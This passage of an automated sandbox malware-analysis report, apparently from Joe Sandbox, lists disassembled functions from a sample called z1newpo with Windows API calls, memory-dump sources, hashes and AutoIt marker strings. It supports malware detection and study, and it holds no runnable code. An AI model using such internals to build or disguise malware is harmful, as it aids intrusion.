                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                    Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                    • String ID: X$pWH
                                                    • API String ID: 85490731-941433119
                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                    Function 0426B050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0426B095
                                                    • ExitProcess.KERNEL32(00000000), ref: 0426B0B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$CreateExit
                                                    • String ID: D
                                                    • API String ID: 126409537-2746444292
                                                    • Opcode ID: 9ec10d9bb68332e7bcdb3756cd9d8bc900757a5150bae08cbb91c2426b35d2e1
                                                    • Instruction ID: 287b1297ef842ad17d9983c6d978200e299af451d49a99b593ba6d86610056d5
                                                    • Opcode Fuzzy Hash: 9ec10d9bb68332e7bcdb3756cd9d8bc900757a5150bae08cbb91c2426b35d2e1
                                                    • Instruction Fuzzy Hash: 34F0E171A5024CABDB60EFE4CC49FEE777CBF44705F008508BA5A9A144DA74A5488761
                                                    Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 00401B57
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                    • String ID: @EXITCODE
                                                    • API String ID: 2734553683-3436989551
                                                    • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                    • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                    • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                    • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                    Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                    • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                    • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                    • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                    Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1794320848-0
                                                    • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                    • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                    • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                    • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                    Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentTerminate
                                                    • String ID:
                                                    • API String ID: 2429186680-0
                                                    • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                    • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                    • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                    • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                    Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_
                                                    • String ID:
                                                    • API String ID: 1144537725-0
                                                    • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                    • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                    • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                    • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                    Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0043214B
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • _malloc.LIBCMT ref: 0043215D
                                                    • _malloc.LIBCMT ref: 0043216F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _malloc$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 680241177-0
                                                    • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                    • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                    • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                    • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                    Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                    • _free.LIBCMT ref: 004295A0
                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                    • API String ID: 3938964917-2806939583
                                                    • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                    • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                    Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _strcat
                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                    • API String ID: 1765576173-2684727018
                                                    • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                    • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                    Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                    • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                    • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                    • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                    Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 004678F7
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__wsplitpath_malloc
                                                    • String ID:
                                                    • API String ID: 4163294574-0
                                                    • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                    • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                    • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                    • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                    Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                    • _strcat.LIBCMT ref: 0040F786
                                                      • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                      • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                    • String ID:
                                                    • API String ID: 3199840319-0
                                                    • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                    • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                    • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                    • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                    Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                    • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FreeInfoLibraryParametersSystem
                                                    • String ID:
                                                    • API String ID: 3403648963-0
                                                    • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                    • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                    • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                    • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                    Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
